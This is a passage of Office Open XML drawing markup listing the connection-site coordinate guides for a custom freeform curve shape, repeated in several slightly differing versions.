              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1629820"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1629820"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1629820"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1629820"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1629820"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1629820"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1629820"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1629820"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1629820"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1629820"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1629820"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1629820"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1629820"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1629820"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1629820"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1629820"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1629820"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1629820"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1629820"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1629820"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1629820"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1629820"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1629820"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1629820"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1629820"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1629820"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1629820"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1629820"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1629820"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1629820"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1629820"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1629820"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1629820"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1629820"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1629820"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1629820"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1629820"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1629820"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1629820"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1629820"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1629820"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1629820"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1629820"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1629820"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1629820"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1629820"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1629820"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1629820"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1629820"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1629820"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1629820"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1629820"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1629820"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1629820"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1629820"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1629820"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1629820"/>
              <a:gd name="connsiteX62" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1586048 h 1629820"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1586048 h 1629820"/>
              <a:gd name="connsiteX1" fmla="*/ 93535 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1629820 h 1629820"/>
              <a:gd name="connsiteX2" fmla="*/ 374830 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1574915 h 1629820"/>
              <a:gd name="connsiteX3" fmla="*/ 607503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819 h 1629820"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1629820"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1629820"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1629820"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1629820"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1629820"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1629820"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1629820"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1629820"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1629820"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1629820"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1629820"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1629820"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1629820"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1629820"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1629820"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1629820"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1629820"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1629820"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1629820"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1629820"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1629820"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1629820"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1629820"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1629820"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1629820"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1629820"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1629820"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1629820"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1629820"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1629820"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1629820"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1629820"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1629820"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1629820"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1629820"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1629820"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1629820"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1629820"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1629820"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1629820"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1629820"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1629820"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1629820"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1629820"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1629820"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1629820"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1629820"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1629820"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1629820"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1629820"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1629820"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1629820"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1629820"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1629820"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1629820"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1629820"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1629820"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1629820"/>
              <a:gd name="connsiteX62" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1586048 h 1629820"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1586048 h 1629820"/>
              <a:gd name="connsiteX1" fmla="*/ 93535 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1629820 h 1629820"/>
              <a:gd name="connsiteX2" fmla="*/ 374830 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1574915 h 1629820"/>
              <a:gd name="connsiteX3" fmla="*/ 607503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819 h 1629820"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1629820"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1629820"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1629820"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1629820"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1629820"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1629820"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1629820"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1629820"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1629820"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1629820"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1629820"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1629820"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1629820"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1629820"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1629820"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1629820"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1629820"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1629820"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1629820"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1629820"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1629820"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1629820"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1629820"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1629820"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1629820"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1629820"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1629820"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1629820"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1629820"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1629820"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1629820"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1629820"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1629820"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1629820"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1629820"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1629820"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1629820"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1629820"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1629820"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1629820"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1629820"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1629820"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1629820"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1629820"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1629820"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1629820"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1629820"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1629820"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1629820"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1629820"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1629820"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1629820"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1629820"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1629820"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1629820"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1629820"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1629820"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1629820"/>
              <a:gd name="connsiteX62" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1586048 h 1629820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07503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819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92452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1613814"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1613814"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1613814"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1613814"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1613814"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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07503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819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92452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1613814"/>
              <a:gd name="connsiteX8" fmla="*/ 1534533 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1493590 h 1613814"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1613814"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1613814"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1613814"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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07503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819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534533 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1493590 h 1613814"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1613814"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1613814"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1613814"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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07503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819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17911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1613814"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1613814"/>
